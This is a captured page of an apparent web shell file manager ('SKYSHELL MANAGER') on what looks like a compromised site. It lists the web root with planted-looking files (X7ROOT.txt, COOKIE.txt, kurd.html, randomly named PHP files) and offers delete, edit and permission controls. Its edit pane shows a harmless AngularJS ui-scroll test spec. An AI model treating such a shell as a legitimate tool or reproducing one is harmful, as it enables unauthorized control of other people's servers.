📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: VisibilitySwitchingSpec.js
/*global describe, beforeEach, module, it, expect, runTest */ describe('uiScroll', function () { 'use strict'; beforeEach(module('ui.scroll')); beforeEach(module('ui.scroll.test.datasources')); var checkContent = function (viewport, count) { for (var i = 1; i < count - 1; i++) { var row = viewport.children()[i]; expect(row.tagName.toLowerCase()).toBe('div'); expect(row.innerHTML).toBe(i + ': item' + i); } }; describe('viewport visibility changing', function () { var scrollSettings = { datasource: 'myMultipageDatasource', viewportHeight: 200, itemHeight: 40, bufferSize: 3, adapter: 'adapter' }; var onePackItemsCount = 3 + 2; var twoPacksItemsCount = 3 * 3 + 2; it('should create 9 divs with data (+ 2 padding divs)', function () { runTest(scrollSettings, function (viewport) { expect(viewport.children().length).toBe(twoPacksItemsCount); expect(viewport.scrollTop()).toBe(0); expect(viewport.children().css('height')).toBe('0px'); expect(angular.element(viewport.children()[twoPacksItemsCount - 1]).css('height')).toBe('0px'); checkContent(viewport, twoPacksItemsCount); } ); }); it('should preserve elements after visibility switched off (display:none)', function () { runTest(scrollSettings, function (viewport) { viewport.css('display','none'); expect(viewport.children().length).toBe(twoPacksItemsCount); expect(viewport.scrollTop()).toBe(0); expect(viewport.children().css('height')).toBe('0px'); expect(angular.element(viewport.children()[twoPacksItemsCount - 1]).css('height')).toBe('0px'); checkContent(viewport, twoPacksItemsCount); } ); }); it('should only load one batch with visibility switched off (display:none)', function () { runTest(scrollSettings, function (viewport, scope, $timeout) { viewport.css('display','none'); scope.adapter.reload(); $timeout.flush(); expect(viewport.children().length).toBe(onePackItemsCount); expect(viewport.scrollTop()).toBe(0); expect(viewport.children().css('height')).toBe('0px'); expect(angular.element(viewport.children()[onePackItemsCount - 1]).css('height')).toBe('0px'); checkContent(viewport, onePackItemsCount); } ); }); it('should load full set after visibility switched back on', function () { runTest(scrollSettings, function (viewport, scope, $timeout) { viewport.css('display','none'); scope.adapter.reload(); $timeout.flush(); viewport.css('display','block'); scope.$apply(); $timeout.flush(); expect(viewport.children().length).toBe(twoPacksItemsCount); expect(viewport.scrollTop()).toBe(0); expect(viewport.children().css('height')).toBe('0px'); expect(angular.element(viewport.children()[twoPacksItemsCount - 1]).css('height')).toBe('0px'); checkContent(viewport, onePackItemsCount); } ); }); }); describe('items visibility changing', function () { var scrollSettings = { datasource: 'myMultipageDatasource', viewportHeight: 200, itemHeight: '0', bufferSize: 3, adapter: 'adapter' }; var onePackItemsCount = 3 + 2; var twoPacksItemsCount = 3 * 2 + 2; it('should only load one batch with items height = 0', function () { runTest(scrollSettings, function (viewport) { expect(viewport.children().length).toBe(onePackItemsCount); expect(viewport.scrollTop()).toBe(0); checkContent(viewport, onePackItemsCount); } ); }); it('should load full set after height of some item switched to non-zero', function () { runTest(scrollSettings, function (viewport, scope, $timeout) { angular.element(viewport.children()[onePackItemsCount - 1]).css('height', 40); expect(angular.element(viewport.children()[onePackItemsCount - 1]).css('height')).toBe('40px'); scope.$apply(); //$timeout.flush(); $timeout(function() { expect(viewport.children().length).toBe(twoPacksItemsCount); expect(viewport.scrollTop()).toBe(0); checkContent(viewport, twoPacksItemsCount); }, 0); } ); }); }); });
Save